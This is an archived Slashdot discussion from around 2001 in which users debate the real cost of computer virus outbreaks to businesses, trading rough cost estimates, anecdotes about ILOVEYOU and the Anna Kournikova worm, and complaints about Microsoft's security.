Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

How Much Do Computer Virus Attacks Really Cost?

Cliff posted more than 13 years ago | from the let's-get-some-cost-analysis-on-that-17B-figure,-Bob! dept.

United States 325

An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.

Sorry! There are no comments related to the filter you selected.

Re:Stupidity (1)

Anonymous Coward | more than 13 years ago | (#436944)

Easy, they have a free online scanning service, and I am sure it is phoning home with statistics, etc. I would imagine that all of the antivirus software, and all of Microsofts software has backdoors in it where they can gain information...

How much did US Buisnesses gain? (1)

McBeth (1724) | more than 13 years ago | (#436948)

What about the buisness that Symantec, MacAffe, and whoever else is in the anti-virus buisness. How much did they pull in for their software? I think that would be much more interesting

that depends on (1)

peterjm (1865) | more than 13 years ago | (#436949)

how much you would give me for my sanity.
the first thing that goes when the next big virus hits my company is my sanity.
this is because multiple messages are sent to all saying

"the message with as a subject line is a virus, don't open it. get your virus update here"

and then you see 10 messages right after it with the afore mentioned subject.

I don't know why these people have an email account anyway, they can't f*cking read.

I hate monday.

Here you have, ;o)


Re:The real cost of viruses... $$ AND time (1)

Evangelion (2145) | more than 13 years ago | (#436951)

Viruses cost people time - time that they could be working on something else, like "real work", not maintence.

Correct me if I'm wrong, but isn't the "real work" of a sysadmin exactly that - maintenence?


I use Macs. Total cost $0.00 (1)

crovira (10242) | more than 13 years ago | (#436959)

Read it and weep. Script kiddies are too ignorant to do damage on anything their tools can't handle.

Oh that's nothing, imagine what car crashes cost (1)

afniv (10789) | more than 13 years ago | (#436962)

I'll bet that's a tiny amount compares too, say, car crashes.

How much money do I have to spend for air bags, seat belts, good tires, anti-lock brakes, bumpers, safety glass, energy absorbing body, car insurance and more air bags? That doesn't include damaged cars in actual accidents. I spend all that money on the expectation that I will be in an accident. I imagine coporate losses include all the "insurance". I would think the only costs a company pays for is some lost productivity and some bandwidth loss. But all the insurance seams to get included.

I was just spamed by a virus in Outlook this morning. Now I can't find my real e-mail....

"Man könnte froh sein, wenn die Luft so rein wäre wie das Bier"

Re:How much do virus *myths* cost businesses? (1)

gehrehmee (16338) | more than 13 years ago | (#436972)

Then again, the statement has often been made that:
"How much did the Y2K *myth* cost businesses"

My Company's Cost (1)

Khan (19367) | more than 13 years ago | (#436974)

Absolutly $0.00! "How is that possible!?" you ask? Well, for starters, we don't run any of the usual suspects that allow for virus proliferation like Outlook, Word, Exchange, etc. Second, a long time ago we installed AV software on EVERY machine that walks out the door and we update the dat files weekly. Also, a very handy little trick is to associate VBS with Notepad. It's amazing how nice that script looks in plain text ;)

My *&^(*&^ Company (1)

abh (22332) | more than 13 years ago | (#436976)

All I know is that right now my entire company (leading manufacturer of graphics tablets in the world) is without email because our Exchange server is down because some idiot ran a vbs attachment.

Cost is relative (1)

MindStalker (22827) | more than 13 years ago | (#436979)

I personally hate it when people give figured for the "cost" of something or other to US buisnesses. Because if we can all remember every dollar spend is a dollar made by someone else. So if I have to pay a tech to come and fix all the computer, or buy better virus detection software. That isn't costing anything to US companies as a whole. Now if you want an acurate figure you would want to compute cost of total productivity because people couldn't get their work done. And once again you would have to look at increased productivity among people who solve virus problems :) But all in all I'm sure you could come up with some lost of total GDP just have to consider what a lose really is.

Is your bandwidth free?? (1)

fuckface (32611) | more than 13 years ago | (#436984)

Not everybody is as lucky as you to have completely free data rates. Stupid troll.

Re:Microsoft (1)

Quebec (35169) | more than 13 years ago | (#436987)

I agree a lot and worse, for quite a while now I'm asking myself why people don't sue Microsoft for it?
Is Microsoft free of any liabilities?

Some 'real' numbers (1)

jsfetzik (40515) | more than 13 years ago | (#436991)

Here is an example of where the numbers may come from.

Assume your company got hit by the LoveBug virus.

You decide to shut down all PC's because it is early in the day and you do not yet know how much damage the virus can do.

Assume your employees can not use their PC's for 2 hours.

Assume your employees cost you $30/hours.

Assume you have 500 employees.

So your cost of the virus is (2 hours)*($30/hour)*(500 employees) = $30000.

Multiply that by 1000 companies and you have now 'lost' 30 million dollars. Inflate your numbers a bit more and multiple by 10-20 virus attacks per year and you end up in the billions pretty quick.

There are also a few other 'costs' thrown in, such as the time it takes your staff to clean things up, the phone bills for associated calls, the bandwidth to download virus updates, etc. These are small cost relative to the lost time listed above.

Now this is just an example and it not meant to be typical, or even accurate. It does show where the numbers come from however.

You may also laugh at the down time of 2 hours, particualrly in retrospect, but it does happen. The company work for was very conservative and had everyone shut down their PC until they could all be checked by IT personel. This took almost 14 hours to accomplish and most people had no PC access for their entry 8 hour work day.

Inflated Costs explained (1)

AhNewBis (42974) | more than 13 years ago | (#436994)

Simple. The costs are actually multiples of assumption that NO work has been done during the disinfection of the virus.

Assume if you will the following:

Small business of 200 employees.
IS/IT department of 5 people.
Virus infects 100 of the computers.

Now, disenfection isn't just enough. The user will have to back up all of his/her current relevant data, have it scanned, and then the machine is restored using Ghost or some such program. Then, the user has to retrieve their data again, set up any other software necessary (or have it set up for them by IS/IT), re-customize their computer, and get things running smoothly.

Now, where do the costs come in?

- 'Downtime' of employees having their systems restored
- 'Downtime' of employees recustomizing their system to working order
- Additional time paid to IS/IT just because of the virus

Ok, so 100 employees were infected. Say it takes about a half-hour for IS to ghost a machine (50 hours for all machines), and only 5 machines can be ghosted at a time because of the bandwidth tax on the poor network. 10 machines an hour, for a total of 50 IS/IT hours.

* FIRST COST: 50 IS/IT hours. *

Allright, then you have 100 employees that aren't billing for a total of 50 hours because of the time it takes to ghost the machines.

* SECOND COST: 50 worker hours. *

Now, you have the amount of time it takes for an employee to restore their machine is another hour per machine infected.

* THIRD COST: 100 worker hours. *

And lastly, you have the billable time that could have been charged to a client if those machines were up and running.

* FOURTH COST: 150 billed worker hours *

So the total is 50 IS/IT hours, 150 Worker pay hours, and 150 worker billed hours.

Say IS/IT gets paid $20/hour. Say workers get paid $20/hour. Say clients get charged $75/hour.

Let's add that up.
(20*50) = $ 1000
(20*150) = $ 3000
(75*150) = $11250

Total: $15250 for 100 infected machines.

Now, also realize that the workers aren't getting paid that much, and the clients aren't getting charged that much.

Now, let's change this to a law firm of 100 infected computers, with the exact same numbers as far as hours concerned.

Say IS/IT gets paid $50/hour. Say the workers get paid $75/hour. Say the clients get charged $200/hour.

(50*50) = $ 2500
(75*150) = $11250
(200*150) = $30000

Total: $43750 for 100 infected machines

Of course, scale that for extra precautions:

- Additional hours for backing up data
- Additional costs of Anti-Virus software
- Additional time costs (same rate) for scanning machines
- Additional time costs (same rate) for backing up data
- Ghosting *ALL* machines
- Costs of Memos, bulletins, et al regarding virus procedures.

Imagine that instead of just infected machines being ghosted, nearly all of the machines get ghosted. That's $100,000 for one working day. Of course, these things spend multiple days for multiple networks clearing data, so one medium-sized company can easily bill $5,000,000 to ILOVEYOU.

Technically, by Geek standards, IS/IT is doing their job (fixing machines). By our standards, their pay shouldn't be applied to squashing virii. Also, there should be other machines for all of the other drones to work on, and other tasks that don't require machines.

However, hardware and software isn't the issue. It's the time that clients are billed for, time is what workers get money for, and time that is lost in the eyes of the CEO/CFO. So, $5,000,000 is the combined amount of income that would have been exchanged (not earned, just exchanged) during that time. So, their losses come to $5 million.

Send the bill to Anna. (1)

Katya (44995) | more than 13 years ago | (#437001)

If it wasn't about her being so darned attractive to computer geek guys, we'd never have these problems. ;)

Re:Stupidity (1)

Meltr (45049) | more than 13 years ago | (#437002)

This shows only the number of infected files from each state. Obviously the more populous states have more infected files.

Re:Stupidity (1)

darkonc (47285) | more than 13 years ago | (#437003)

Obviously, it would be better to have a listing of infections per capita (or IPM (Infections per Million)). Nontheless, Canada -- with 30+M people seems to have a surprisingly low infection rate. compared to some of the US states -- despite having a similar computer usage rate to the USA.

Re:The real cost of viruses... $$ AND time (1)

UnknownSoldier (67820) | more than 13 years ago | (#437008)

> The main element in any calculation of this kind is "time",

Correct, because that is what money is: something that denotes "compressed time"

> that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

If I have to spend time cleaning up the virus, be it downloading the latest virus definations, or running a system wide virus check, then the *TIME* I am NOT working on producing something, *IS* the cost.

Viruses cost people time - time that they could be working on something else, like "real work", not maintence.

You have a point - the virus checking should be scheduled late at nite. But everyone turns there computers off when they leave for home, since it makes a noticable difference in the companies electric bill.


Re:Personal estimate.. (1)

technos (73414) | more than 13 years ago | (#437012)

Oops. 17.1 billion..

Uhm, the damage incurred is not from the virus, (1)

Jailbrekr (73837) | more than 13 years ago | (#437013)

but from the open email clients that allow these little buggers to do the damage, and propagate like minks.......

I worked for a company that used Lotus Notes, and when the ILOVEYOU virus hit, there was only 1 instance of any damage being done, and it was easily reversable. The virus was not propogated within our network, our mail server was not overloaded to the point of crashing, and the damage that it *did* do (due to a user receiving and launching the .VBS script) was easily reversed (we were using Novell, so undeleting the deleted JPG files was a breeze).

Og that 18Billion dollars, how much of it is due to the virii, and how much is due to the shit mail servers on the market today?

the gov (1)

MoiTominator (75986) | more than 13 years ago | (#437014)

I'd like to know how much virii and similar attacks cost governments. Something that I pay for.

A lot of respect,,, (1)

supabeast! (84658) | more than 13 years ago | (#437019)

Just a few moments ago, one of our sysadmins was stupid enough to run the Kournikova vbscript, and we will be making fun of him for months because of it.

Of course, the real downer was the idiot on our helpdesk who ran it and sent it to all of our customer contacts.

Re:The real cost of viruses... (1)

Amokscience (86909) | more than 13 years ago | (#437020)

You also need to factor in time for regular empoyees to check the validity of code/information. Not to mention the time they have lost. (This applies to hacker/cracker breakins as well)

Say you're developing the next Boeing aircraft and a virus sweeps through:

Maybe it has infected all machines. Maybe only some groups. You have to verify that the virus did not damage any critical files. Factor in the time that employees spend not working (even if all you do is a global backup restore) and the costs grow large. Imagine paying a few hundred engineers to do nothing for a couple days.

I partially agree.... (1)

duplicate-nickname (87112) | more than 13 years ago | (#437022)

We pay about $24 per client for anti-virus software, which include server/groupware protection. I would estimate that we only spend 2-3 hours a month (400 user base) maintaining virus software and responding to infections. However, I don't think one can include the cost of the antivirus software in your estimate. Even if there were to CIH, Melissa, or Love Bug, we would still be running the software. It's part of the total data protection plan that includes backups, UPS's, redundant servers and hardware, A/C in the server rooms, and fire protection.

So that's 2 hours per month at $40/hour ==> $960/yr for 400 users.

Virus Cost according to ICSA (1)

DeePCedure (99267) | more than 13 years ago | (#437025)

Peter Tippet, vice chairman and CTO of the International Computer Security Association (ICSA), [] gave keynote speach at the '98 International Virus Prevention Conference called "Virus Costs vs. Various Protection Strategies". The presentation was made available for download here [] (zip file). The presentation download included a spreadsheet with formulae and statistical data to calculate the quarterly or annual cost of virus activity for your enterprise.
Used in conjunction with the ICSA's annual Virus Prevalence Survey (available here [] ) you should be able to update any '97 data and find out what viruses cost you today.
Both the IVPC presentation and the Virus Prevalence Survey are heavy on both statistics and supporting data.

Cost depends on size... (1)

11thangel (103409) | more than 13 years ago | (#437028)

Well, the virus effects several things. Downtime required to restore from backup or clean the virus out. Lost money during that downtime. The lost money from any data lost between the last backup and attack time. Plus, the loss of respect due to being hit by the virus. If you are a small company, or the computer that is hit is not very important, losses will be minimal. But if your primary server goes down and you are a big corp, then if you dont have backups ready and in the loop (thank you round robin DNS) you'll be in big trouble. In short, big companies have the worry of losing more money and customers, but they wont have to worry anywhere near as much as a small company where that kind of loss can really do damage.

$17.1 Billion dollars?? (1)

Mordred (104619) | more than 13 years ago | (#437029)

Well we've had some problem with viruses going around here at work, but they haven't cost us any actual business. I'm willing to bet they're more of an annoyance for most places rather than something which does serious damage.

Still I'm not going to dispute that $17.1 Billion figure. However I think a majority of that money is somehow being deposited into MacAfee, Norton, et al's pockets. That's the real cost of virii.


I think...Marketing of fear=sales (1)

ericdano (113424) | more than 13 years ago | (#437037)

I think a lot of it is hype. You THINK you really need a virus protection program. You really probably don't. I have met so many people CONVINCED that they can get a virus. Honestly, I have NEVER had one on my *gasp* windows machine. And get all kinds of questionable programs and stuff all the time.

It's marketing, marketing fear to people who don't know anything about computers......

How to Calculate Actual Cost (1)

bluemiracle (113916) | more than 13 years ago | (#437038)

It would have to include a number of factors, wouldn't it? Im sure man-hours would the prime cost, some physical cost for damaged chips, etc. But I still dont see where they could generate such a large number from a small, though viable, computer virus. First Post? :-P

Chargeing Costs to OS developers (1)

sPaKr (116314) | more than 13 years ago | (#437042)

It seems to me that the reason we still are talking about virii is that MS still doesnt know how to write an OS that controls permissions. How many people have been hit by a virus on a *ix system ? Worse case is you dork your own files, but the chance of it spreading are far and few between. I mean in the last ten years you can count the number of virii/worms/trojans for *ix on one hand. Yet it seems that a new virus for an MS product comes out daily if not hourly. This leads me to suspect that even if MS could write a real OS they wouldnt. It would negate the virus scanning software market. How much money would Symantec loose if MS could write a real OS?. What ever the cost of a virus it should be charged to the developer of the application. Im sure the unix people have no problem with the cost wouldnt mean much, but in the MS world the numbers would hit the moon. It seems that we are artificialy producing an market segment. How many people will be pissed off when they learn that the only reason we are talking about virii is becouse MS is a full of a bunch of tards?

Re:The real cost of viruses... (1)

Saltine Cracker (116414) | more than 13 years ago | (#437043)

You're assuming the cost of the system admin is the only cost we care about....

If the question is how much does it cost a company, one would have to look beyond the sysadmin. The last company I worked for was hit by "I love you" they were running MS Exchange, Outlook, and the rest of the M$ software. Email is email and it's not all that important right? Wrong. One person opens the wrong email, BAM, your server is sending so many emails that within minutes it will have crashed. Anyone else who logs into that client system will start that process over. Any person who logged into the infected system and logs into another system will start that process over.

Hopefully, none of your customer's email addresses were stored in the address book of that infected system. The PR nightmare that occurred because we sent "I Love You" to several customers was horrible. We lost one, and another who was one of our biggest supporters, decided not to let our prospective customers call them for referral.

In all we system admins only spent about 32 hours cleaning up the virus and the resulting email server crashes.

The cost the company assumes when a virus hits can be huge. Workstation downtime, Server downtime, Sysadmin/firefighter work, Customer Relations and Image issues that result. In all it can be very expensive.

Some of those costs are difficult to mathematically account for. Especially when it comes to the value a single customer has.

How do you calculate lost WASTED time? (1)

Ronin X (121414) | more than 13 years ago | (#437044)

If a vb script virus is transmitted by someone opening an 'I love you' or 'AnnaKournekova.jpg' how much productivity are you REALLY losing? They just don't have as much time to waste. I suppose it could have a terrible impact on morale...

Viruses and Money (1)

Adam Jenkins (121697) | more than 13 years ago | (#437045)

I think the real question is how much do anti virus companies "mis-judge" how big a virus will be when they do their big usually wildly inaccurate PRs to CNN etc. If there are thousands of companies who've just spent $000s on antivirus software, how many IT staff will then turn around and say "er well, hardly anyone got the virus anyway, we just wasted your money Mr/Ms CEO"? It will be patting of backs and "Phew, lucky we spent all this money!". So then is that still a cost, given that they would not have got the virus anyway?
Never try to teach a pig to sing. It wastes your time and annoys the pig.

No virus metrics exist (1)

ErfC (127418) | more than 13 years ago | (#437048)

Nobody actually knows how much viri cost, because nobody records any data about the viri or their activities. (See this article [] at [] for a good discussion.) All these numbers are estimated from anecdotal evidence; a lot of the damage comes from "preventative measures" (like shutting down your entire email server for two days so some virus doesn't come along and shut down your email server); and a good chunk of these numbers come from other press reports, which get them from other press reports, which get them from people who were "estimating" (read: making them up) on the spot.

-Erf C.

Money Loss (1)

bdigit (132070) | more than 13 years ago | (#437050)

In my company alone we lost 17.1 billion dollars in the year 2000. No im not just saying the number that was said in the article.

real cost (1)

avandesande (143899) | more than 13 years ago | (#437056)

I don't think virus cost nearly that much. Most cubicle dwellers have quite a bit of extra time on their hands, and if a virus takes away from this 'free' time it doesn't cost anything.
Someone should do a study to see if IM traffic or Slashdot posts goes down when there is a virus outbreak.

At least one figure can be accurate (1)

djrogers (153854) | more than 13 years ago | (#437061)

The cost of AV software, on the desktop, on the servers, and on the firewalls is directly related to virus attacks, thus that figure can be easily included in the calculations. The gross income of companies such as Trend Micro, McAfee, and Norton is mostly from the sale of AV licenses / updates, and I'm sure it would be a simple matter of a phone call to Investor Relations at each company to get exact figures related to such sales.
As stated by others, the rest - time, lost productivity, etc is harder to calculate, but at least you'll get part of it accurately.

NOTHING!!! (1)

spyrral (162842) | more than 13 years ago | (#437067)

You get them for free from other people!

Way too simplistic of a model (1)

InsaneGeek (175763) | more than 13 years ago | (#437074)

Your model assumes that the backup would be able to restore to the exact moment people were working at. We have over a hundred developers here, and if something bad were to happen to our devel environment (admins had a pc-nfs mount somewhere bad), if we where to throw out half the developers (for as you say breaks, etc) and luckily be out only 4 hours from the last backup... (which actually tends to be 8 hours for most places, others do it hourly, or every other hour)

50 workers * 4 hours = 200 lost man hours just for the developers to replace what they did since last backup + however long developers have to sit on their thumbs while the restore occurs + all the rest of the things (time diverted from other projects, etc.) you end up with a lot of time.

Your model mimics the old joke email 260 million people in the US, 114mil retired, 93 mil in school... 206,000 in hospitals... leaving only one person doing all the work.

The Problem is prevention and education. (1)

noahbagels (177540) | more than 13 years ago | (#437079)

My past two companies had their exchange servers overloaded and subsequently taken offline for several days.

Cost to company: No dumb powerpoints for a few days!.

The engineers who accounted for the majority of revenue at both firms, were able to continue working with less interruption from marketing weenies for hours on end. Our meetings went smoothly without M$ Project / Powerpoint files distributed by email.

At both companies, the IT departments were completely ill-prepared to deal with such problems.
In fact, Power outages at both firms over 6 months ago (not related to current CA power funkiness), knocked out email and fileservers because of our IT department's small budget and poorly trained staff.

Bottom line: Find, Pay, Train, and Retain good IT staff, and fund them well enough to keep the business running.
PG&E working down the street shouldn't disable engineering fileservers for a few days due to inadequate backups, nor should virii.

F$CK the client side virus scanners that bog down our systems. Our entire engineering team uninstalled the binaries for Sophos anti-virus / productivity-nullifier after out IT team remote-installed it, and it took up > 30% of all available cpu cycles and all disk cycles - even during development!

Re:How to Calculate Actual Cost (1)

cnkeller (181482) | more than 13 years ago | (#437081)


You must be getting some really nasty viruses in your neck of the woods if they are damaging the chips (or even the firmware).

Re:Send the bill to Anna. (1)

Moose4 (182029) | more than 13 years ago | (#437082)

We got Anna'd here too. Personally, I'm trying to figure out why every single person that sent it to me was female. Not a single man opened that attachment. I think I'm skeered.

Re: How Much Do Computer Virus Attacks Really Cost (1)

jchristl (184275) | more than 13 years ago | (#437083)

Plenty, I say. The bigger the company the bigger the cost. The company I work for has paid well over 10's of thousands of dollars on Anti-virus licenses alone!!!

Not to mention the mandatory email outages when a new macro virus hits, and who knows what background costs that affects...

Don't get me started (1)

AintTooProudToBeg (187954) | more than 13 years ago | (#437085)

Here in Los Angeles (310 area code), PacBell started requiring people to dial 1-310-xxx-xxxx even when dialing local numbers. People claimed that this cost companies millions of dollars in wasted productivity. After about 6 months of hearing complaints, PacBell backed off.

Re:Send the bill to Anna. (1)

ChelleyBean (196830) | more than 13 years ago | (#437090)

Well that explains why it might hit computer related businesses, but how the heck did it end up on our server? We don't have any computer geeks guys.

The cost of Microsoft (1)

mkcmkc (197982) | more than 13 years ago | (#437092)

Viruses probably are quite expensive, but this is not a generic cost. They should be accounted for primarily as a cost of choosing Microsoft, just as lung cancer should be accounted for primarily as a result of smoking.



gdyanky (205597) | more than 13 years ago | (#437096)

Alanis Morisette said it best. "Isn't it Ironic, dont you think" I havent gotten any details on it yet..but where I am it is spreading pretty fast. Seems like symantec and sarc are being hit hard.

Real costs (1)

orcus867 (209100) | more than 13 years ago | (#437098)

There are several factors that I have always seen used to justify cost of virus infections: The sysadmin time, the infected user's time, the bandwidth on the network, and used space on the network drives due to the virus.

However, the only real cost is that of the infected user. The sysadmin's time, whether it be disinfecting a computer or troubleshooting a non-related network problem, his time is already paid for. The same goes for network bandwidth and server space; both of these cannot be quantified into total costs as they too are already paid for.

The only true cost indicator of virus infections are the hourly costs of the infected user during the time of the cleanup and the hard cash purchase of antivirus software. One should also take into account the amount of time the infected user will talk about their virus infection well after the sysadmin has cleaned up their computer.


orcus867 (209100) | more than 13 years ago | (#437099)

I hope you mean that Symantec is being hit hard with requests for their AV software... it would be scary to this otherwise as the virus has been in the wild since August!

Not significant unless servers affected. (1)

Bistromat (209985) | more than 13 years ago | (#437100)

$17.1 billion? Not even close. The true cost of virii is negligible unless one infects a mission-critical server - an employee's time spent reformatting a system is valuable, certainly, but not nearly as valuable as that Win2K Advanced Server suddenly seems when it goes down (or worse, emails your trivially-decrypted NT passwords to some kiddie in Zimbabwe), preventing your customers from buying those highly profitable Thneeds, or whatever it is you sell. After all, -everyone- needs a Thneed.

Back to the point, though, I've never heard of a virus infecting a major server - usually, people aren't reading their mail on servers, and only the most mentally-deficient MIS would be retarded enough to open email attachments or download warez on a mission-critical server. And then, well, he deserves what he gets.


I wrote for CE once (1)

TarPitt (217247) | more than 13 years ago | (#437108)

Computer Economics, at least approx. 5 years ago, was more a publishing house than a research firm. Most of the articles were freelanced, though the author is not credited with authorship (they wanted to give the impression of having a large in-house research staff). I would take anything out of here with a large grain of salt.

Is this number footnoted? Is an explanation of the methodology behind it explained? Is there an author listed for the article? If so, what is the author's credentials? Can you possibly contact the author and ask where this number came from?

Personally, I would try to find other sources for a number of this type. Open source principles apply to research as well as code. If people don't publish the "source", don't buy it!

Re:How to Calculate Actual Cost (1)

Clubber Lang (219001) | more than 13 years ago | (#437110)

Chips? Would that be bags of chips the sysadmins were snacking on, and then threw at the wall in anger? Or perhaps virus attacks in the UK cause people to spill their lunches and have their french fries hit the floor.

'Cause if you mean computer chips... widespread, multi-billion dollar hardware damage is a new one to me.

Knock on effect (1)

Kiaradune (222032) | more than 13 years ago | (#437111)

I work for a large College. I'm a comp. tech that wanders around to different outcenters and fixes their problems. This includes virii. Being a College, it's a heavy user of MS products, especially MS Word. My first run in with a virus was a Word 97 Macro, Ethan. There was no network, so the students used floppy disks. The staff at a particular outcenter were requesting that users give the disks to staff at the start of a session to virus check them. Only one computer had the latest software and definition files on. Each disk went in to this machine, the disk was checked (which could take a minute or two) then returned to the student. If the student had another disk they wanted to use, they had to hand this in as well. In a room with 24 machines, at about 2 minutes/disk, that's almost an hour's work and waiting for both staff and student for each session, of which there were several each day. It all added up. As part of my job, I had to install virus checkers onto ALL the machines, to prevent this disk checking procedure. The machines were really old, the CD-ROM drives disfunctional. The BIOSs were passworded, but the guy that had passworded them had since died, without telling anyone the password. So the only option was to take each machine apart, reset the CMOS with disconnecting the battery, plug in a hard drive with the software and definition files on, then install, put the machine back together, then virus check the entire machine. That's without taking into account the damage that the virus can do (which isn't much). That's one way of looking at it, but don't forget the other way: What damage in terms of reputation to the college has the virus done? Many students become scared with talk of virii. All it takes is for people to say 'I went to xyz college and got a virus on my disk which got onto my home computer'. Also, students can become frustrated at having to wait around for their disks to be checked, and indeed many did not care about the procedure and used their disks, unscanned. The time I spent driving around to outcenters to solve their virus problems could be better spent improving their current facilities, in turn making students happier, which has the knock on effect of more enrolments, which means more money for the college (That's my delusion of grandeur for the day) Be cool. Hi, I'm a .sig virus. Please copy my into your .sig and help me spread!

Re:Microsoft (1)

Verteiron (224042) | more than 13 years ago | (#437113)

Sure enough, the first anti-Microsoft gets modded up.

Anti Virus Software worse than the viruses (1)

SCHecklerX (229973) | more than 13 years ago | (#437117)

I don't work in tech support anymore (Thank god!)

But when I did, most problems anybody had with their machine was the damned virus scanner being cranked up and sucking the life out of the machine every time it opened any type of file.

Why companies spend so much money on something that common sense can fix is beyond me.

If the users are too stupid to not run things they get in attachments, fire 'em!

Virus scanners are viruses themselves afaic.

Re:Microsoft (1)

NineNine (235196) | more than 13 years ago | (#437121)

Brilliant. And have you ever considered how much productivity is GAINED by having VBScript embeeded in email? My bet is that it would outweigh these silly 'viruses'.

If the war on drugs is any indication... (1)

schnitzi (243781) | more than 13 years ago | (#437125)

If the war on drugs is any indication, this figure is a gross exaggeration. Whenever you talk of the "street value" of the narcotics confiscated in a bust, know that you're hearing total bull. Why? It makes the "good" guys feel more important, and the bad guys worse. (Very stupid, actually, because the real effect is that kids hear the figures and think, "Wow, you can make some serious jack selling drugs.") I wouldn't be at all surprised if the same sort of crap going in the sensationalized war on viruses.

Don't get me wrong, I think virus writers should be strung up by their eyelids...

Re:Send the bill to Anna. (1)

ocbwilg (259828) | more than 13 years ago | (#437131)

No kidding. Right now, I'm thinking "Hmm...wonder where I can find some pics of Anna Kournikova..." After just having shut off incoming mail at the firewall until we can get an update for our Exchange servers AV software.

Calculating the actual impact of a virus... (1)

Gruneun (261463) | more than 13 years ago | (#437133)

I find that the easiest calculation of a virus impact is:

Multiply [number in tech staff]
by [people who open the email after being warned]
then multiply by [time it takes to close eyes and count to 10].

We leave out the guilty parties time because it generally doesn't impact the the productivity of the company, anyway.

Re:Microsoft (1)

moishel (262967) | more than 13 years ago | (#437136)

Um... I remember virii on the Mac being a big problem in the late '80s because of the fact that the MacOS opened up and executed the resource for *anything* -- put a floppy in with the wrong WIN (was that it? memory fails me) resource and -- bang -- your entire computer is infected, without the user ever executing a program. Sure, Microsoft's scripting could be better thought out re: security but at least you've got the option to not run the script.

My point is just that lots of 'ease-of-use'/cool things get put into OS's & applications which can be exploited by a savvy virus. It's easy but inaccurate to blame Microsoft. Who knows what kind of virii we might see attacking Linux now that it's becoming more mainstream. I don't know my UNIX/Linux history at all but have there ever been virii spread via emacs? Seems to me like it's ideally suited for that (but I'm anxious to hear why I'm wrong).


Low security clears the way for DoS-attacks. (1)

Joohn (310344) | more than 13 years ago | (#437157)

If you get a virus into your computer, I guess you could blame yourself since you decided to use windows. However, lately so-called DoS attacks has been a popular way to "hack" webplaces by some ill-disposed people. To set up such an attack, you first need to install trojans in pretty large amount of computers. Of course, to be able to install these trojans, these computers can't have very much security, which makes MS windows computers a great choice. The owners of these computers are usually not aware of this. So, the damage caused by viruses and trojans doesn't always affect only the companies who are using os's with lack of security (windows), it can hit anyone. Microsoft sure makes a lot of money, but that's on behalf of others.

Cost? (1)

Anagon (311355) | more than 13 years ago | (#437159)

Today, we've been hit by the AnnaK. VBS Script. It should cost us about $100 USD, total, for coverage of nearly 400 employees. Thats about all I make per day. It is my opinion, that certain companies enlarge the amount of money that virus attacks really cost, mostly for insurance purposes. The worst that can happen, is a few machines have to be reghosted, and the mail server is a little laggy. Anyone who has a properly configured network (antivirus, multiple mail servers, pleanty of disk space, etc) should only have to pay their admins the normal daily salary. Virus's don't cost anything other than that.

Re:I think...Marketing of fear=sales (1)

JohnSmith1138 (313010) | more than 13 years ago | (#437163)

I somewhat agree. In work environments, virus checkers are a must. There is too much to lose in productivity and important files to risk not having a virus scanner. At home, I never run one. I don't have what I would consider "irreplaceable" (well ok, my save games would cause a little frustration at being lost, but they are only games) files at home and I don't like the performance hit and bugs that running a virus scanner causes. I have lost a motherboard due to CIH at home. Fried a bios on an older motherboard and the disk. I could get the disk back, but not the motherboard. At work just last month I received an e-mail from a client that had a virus in it. Their scanners were not up to date and it had infected about 5 computers. That was from opening an e-mail from a trusted source. It sometimes happens, you just need to assess the risk.

some numbers... (1)

saarbruck (314638) | more than 13 years ago | (#437176)

A company I worked for a few years ago got hit with the 'hemp' virus (despite having some anti-virus software installed, I guess we just weren't practicing safe software).

Anyway, it took a week to recover. We lost a week of development (probably the worst thing for an already tight console game schedule) and discovered that a lot of our backups were corrupted. Luckily we were able to find a fairly recent viable one and didn't lose a lot of code or artwork. But we did have to reformat and reinstall every system we had.

So let's see, we had 6 engineers @ $50k/yr. (yeah yeah, we were all entry-level), 10 artists @ 40k/yr., one IT person, let's say 70k. That's about 6000 + 8000 + 1400 = $15,000 in the weekly salaries of the grunts alone. Not to mention building rent or management overhead, and loss of morale.

On a personal note, I lost 2 GB of MP3 files. It was not a tragedy, since I do own CDs for most of my music and could re-encode them, but what a pain! From an engineer's point of view, however, I have to say that it was fascinating to watch the little bugger do its work and change its "gotcha!" message every few hours...

Re:How to Calculate Actual Cost (1)

statusbar (314703) | more than 13 years ago | (#437177)

One company I know of got hit hard by 'I love you'. 1000 people were told, "go home, don't come back for 3 days while we re-install windows on everyone's computers."

They were down for 3 full days.

3 days * 9 hours/day * 1000 people = 27000 hours.

More than half a million dollars lost just in salaries. That's just ONE company.

Re:How to Calculate Actual Cost (1)

statusbar (314703) | more than 13 years ago | (#437178)

Ha! good point!

Well I think they were scared and didn't understand exactly what it did. If I Love You was nastier they could have been required to do that.

Regardless, it cost them $$$$

Plural of "virus" (2)

Anonymous Coward | more than 13 years ago | (#437181)

How ironic. (2)

IGnatius T Foobar (4328) | more than 13 years ago | (#437189)

It's ironic that this story should appear on Slashdot just as Yet Another Visual Basic Virus spreads through the address books of everyone who uses that digital Petri dish of an e-mail program called Microsoft Outlook (or, based on the number of virii it spreads, perhaps it should be called Microsoft Outbreak instead).

The cost of virii is directly proportional to the stubbornness of both users and IT managers who refuse to get rid of programs like Outbreak which have repeatedly demonstrated this sort of problem, with no real remedy on the horizon. Infect me once, shame on you. Infect me twice, shame on me. Infect me three times, and I deserve to die because I'm not taking precautions!

$0 since fall of 1998. (2)

jht (5006) | more than 13 years ago | (#437191)

In 1998, a few months after I took the sysadmin job at my company, we had an infestation of the Class macro virus. It was a pain to clean up and deal with, but my staff and I took care of it in about a day - no data was lost.

After that, we put up an SMTP scanner/gateway between our Exchange server and the rest of the world. I set up filters to automatically block anything executable at all via e-mail, including stuff like .SHS and .VBS files. We have not had an infection of any sort since then - the antivirus portion of the gateway is updated with every update released (engines and definitions), and the clients are updated through management software that updates automatically as well - and the clients are locked into the most paranoid settings available.

